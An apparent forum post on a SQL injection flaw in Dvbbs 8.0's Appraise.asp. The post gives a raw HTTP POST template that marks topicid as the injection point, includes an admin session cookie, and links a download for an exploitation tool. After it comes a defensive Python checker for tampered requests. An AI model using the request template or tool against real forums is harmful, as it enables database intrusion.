Dvbbs 8.0: latest SQL injection vulnerability + exploitation tool

POST /Appraise.asp?action=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://bbs.xxx.com... eplyID=5&skin=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: bbs.xxx.com
Content-Length: 163
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: DvForum=userid=1&usercookies=0&userclass=%B9%DC%C0%ED%D4%B1&username=admin&userhidden=2&password=r84y6115O3q4tPFJ&StatUserID=4419358; w0802=21; rtime=0; ltime=1183993930108; w08_eid=70836889-http%3A//bbs.xxx.com/index.asp%3Fboardid%3D2; ASPSESSI; upNum=0; geturl=%2Fdispbbs%2Easp%3Fboardid%3D2%26ID%3D2%26replyID%3D2%26skin%3D1; Dvbbs=ciffahcie

boardid=2&announceid=5&atype=0&a1=0&a2=0&atitle=thenines&acodestr=3361&ac&topicid=41(add the SQL injection statement here)

Don't forget to update Content-Length.

Note: tool download address: http://www.hackerspirit.com/attachments/month_0708/72007815131341.rar
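An added example, not part of the original post and not Dvbbs code: a defender-side check that flags POSTs to Appraise.asp?action=save whose ID fields are not plain integers after URL-decoding, suitable for a proxy filter or for review of logged request bodies. That boardid and announceid are integer IDs like topicid is an assumption, and the sample requests are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, parse_qsl

# Assumption: these form fields are integer IDs. The page only identifies
# topicid as the injectable one.
INT_FIELDS = ("boardid", "announceid", "topicid")
DIGITS = re.compile(r"[0-9]{1,10}")


def check_appraise_request(raw):
    """Return a list of findings for one raw HTTP request ([] = nothing to flag)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line = head.split("\n", 1)[0].split()
    if len(request_line) < 2 or request_line[0].upper() != "POST":
        return []
    target = urlsplit(request_line[1])
    action = parse_qs(target.query).get("action", [""])[0].lower()
    # IIS paths and classic ASP field names are case-insensitive.
    if not target.path.lower().endswith("/appraise.asp") or action != "save":
        return []
    form = {}
    for name, value in parse_qsl(body.strip(), keep_blank_values=True):
        form.setdefault(name.lower(), []).append(value)  # value is URL-decoded
    findings = []
    for name in INT_FIELDS:
        values = form.get(name, [])
        if len(values) > 1:
            # Classic ASP joins repeated fields with ", ", so the script
            # would no longer see a number.
            findings.append(f"{name}: repeated parameter")
        for value in values:
            if not DIGITS.fullmatch(value):
                findings.append(f"{name}: non-integer value {value!r}")
    return findings


# Constructed sample requests (forum.example is a placeholder host).
_HEAD = ("POST /Appraise.asp?action=save HTTP/1.1\r\n"
         "Host: forum.example\r\n"
         "Content-Type: application/x-www-form-urlencoded\r\n\r\n")
CLEAN = _HEAD + "boardid=2&announceid=5&atitle=hello&topicid=41"
TAMPERED = _HEAD + "boardid=2&announceid=5&atitle=hello&TopicID=41%27"

if __name__ == "__main__":
    for label, req in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(label, check_appraise_request(req))
```

The same allow-list belongs in the ASP script itself: convert each ID to an integer before it reaches the SQL string, or use a parameterized query.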